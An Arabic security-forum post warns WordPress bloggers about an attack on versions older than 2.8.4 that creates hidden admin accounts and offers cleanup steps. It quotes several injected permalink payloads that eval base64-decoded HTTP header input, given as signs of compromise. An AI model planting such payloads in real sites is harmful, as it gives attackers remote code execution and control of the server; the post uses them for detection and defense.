|
خبــر ثغره امنية خطيرة ببرنامج للورد برس Wordpress - تحذير الســــلام عليكمم ورحمة الله وبركاته شباب*** اقتباس:http://sec-r1z.com/images/r1z-1/wordpress-0-d4y.jpg توني قريا خبر "تحذير" من موقع الوورد برس الغني عن التعريف بتحديث بيانات جميع مستخدمين الوورد برس* سواء كأدمن - يوزر * حيث اعربوا بأن مستخدمين الوورد برس يتعرضون لهذا النوع من الإكسبلويت كل ساعه ! حيث يقوم المخترق بزع عضوية الأدمن عند تسجيله بلمدونة فقط ! Otto42 of OttoDestruct* a key WordPress developer and supporter* reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!! Update your WordPress blog before you continue reading this post. That’s how critical this issue is. للوقاية من الثغره: كود:1- تحديث مدونتك الان* الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 . 2- إصدار تقرير من الوورد برس : كيفية الحفـــاظ على مدونتك امنة* بلإضافة الى معلومات حول كيفية عمل تحديث فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ). 3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث مدونتك لأخر إصدار* وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا* بحالة لم تستطع معرفة إصدار مدونتك** وجب عليكم التحديث عبر الموقع الرسمي للورد برس من هنـــا حالا. 4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديثك حاليا" لإصدار مدونتك* لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة** لاكن بحالة عدم ترقية مدونتك* وجب عليكم الترقية الأن. 5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب* لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق* وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا* ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها* حيث تملك وورد برس اكثر من 5*317*360 مليون مشترك بلعالم ! 6- التخوف او الملل من التحديث حالا: إن هذا التحديث مطلوب من جميع اعضاء وورد برس* حيث ان هذه الثغره تعتبر قاتلة لمدونتك* فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث إضافات الوورد برس لديك "إن وجد تحديث لها" حالا . بحالة وجد تحديثات للوورد برس* فسيتم كتابة تحديث للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز* وسيتم إبلاغ اعضائنا بنفس اللحظة. * اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟ اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن* والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا* والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود خبيث" او "شل كود" بهم **وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة* معلومات شخصية ومواضيع شخصية اخرى* ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة* وذالك يعتمد على المخترق* فيتم إختراق سيرفرك كامل من هذه الثغره* فنتمنى التحديث الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفرك ايضا ! صورة توضيحية http://sec-r1z.com/images/statusicon/wol_error.gifClick this bar to view the full image.http://sec-r1z.com/images/r1z-1/Administrator_Panel.jpg ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال %&(%7B$%7Beval(base64_decode($_SERVER%5B HTTP_REFERER%5D))%7D%7D|.+)&%/ او كود:“/%&(% 7B$%7Beval(base64_decode($_SERVER%5BHTTP _EXECCODE%5D))%7D%7D|.+)&% او كود:%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ هذه الأكواد هي عباره عن تشفير نوع "Eval" و “base64_decode” * يمكن المخترق من رفع شل كود لموقعك ( سيرفرك ) وإختراقك كامل. كود:فوجب عليكم إتباع النقطة الاولى الي ذكرتها من قبل* وإن تم وجودهم وجب عليكم حذفهم من "الروابط" بلوحة تحكمكم. ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم** معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ** يوجد بعض الهاكات "تخفي" الأعضاء سواء أدمن او يوزر** فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود للصفحة والبحث فيها عن Administrator او Admin او user_ ** فبحالة عدم وجود شي فإن شاء الله انت بامان*** صورة توضيحية http://sec-r1z.com/images/statusicon/wol_error.gifClick this bar to view the full image.http://sec-r1z.com/images/r1z-1/Admin_source_check.jpg اللحين بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب** ولاكن لو وجد فإن شاء الله نحلها لكم*** لاكن بحالة "لاسمح الله" تم إختراق مدونتكم* او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة* او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له*** فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس WordPress-to-WordPress Import WordPress Plugin ومن ثم عن طريقها ( بعد تثبيتها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا * ومن ثم نقوم بتامين ( صور المدونة وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة /home/username/public_html/wp-content/uploads او كود:/home/username/public_html/images بلحالة هذه بعد الحفظ نقوم بحذف المدونة ( كاملة ) ومن ثم تصطيب مدونة جديدة من هذا الرابط ( الإصدار الاخير للوررد برس 2.8.4 - إضغط هنا ) * ومن ثم بعد التركيب نقوم بتركيب الإضافة الي قمنا بسحب معلومات مدونتنا فيها* ومن ثم نقوم بلضفط على Import للملف الي سحبناه من المدونة. وبإذن الله ترجع المدونة 100% نظيفة من اي شل كود او كود خبيث من المخترق * وايضا من اي ( شك ) بنفسنا بعد الإختراق . للتقليل من إختراق المدونات ( يرجى ) من الجميع نشر الخبر وتحذير كل مالك مدونة من هذه الإكسبلويت عبر هذا الموضوع او منكم شخصيا ( مسنجر او منتدى )** بحيث تقلل من هذه الإختراقات لمدونات الوورد برس** وبحالة وجود اي شي إضافي هذا الدعم الفني ( برنامج الوورد برس من هنا ). الثغره ( الكود ) لم يتم الإعلان عنها بمواقع الحماية حاليا *** مثل ماقلت قبل الثغره اكيد برايفت مازالت* واتوقع صعب تظهر للجميع حاليا. |
| الساعة الآن 09:06 PM |
Powered by vBulletin® Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.5.2 TranZ By
Almuhajir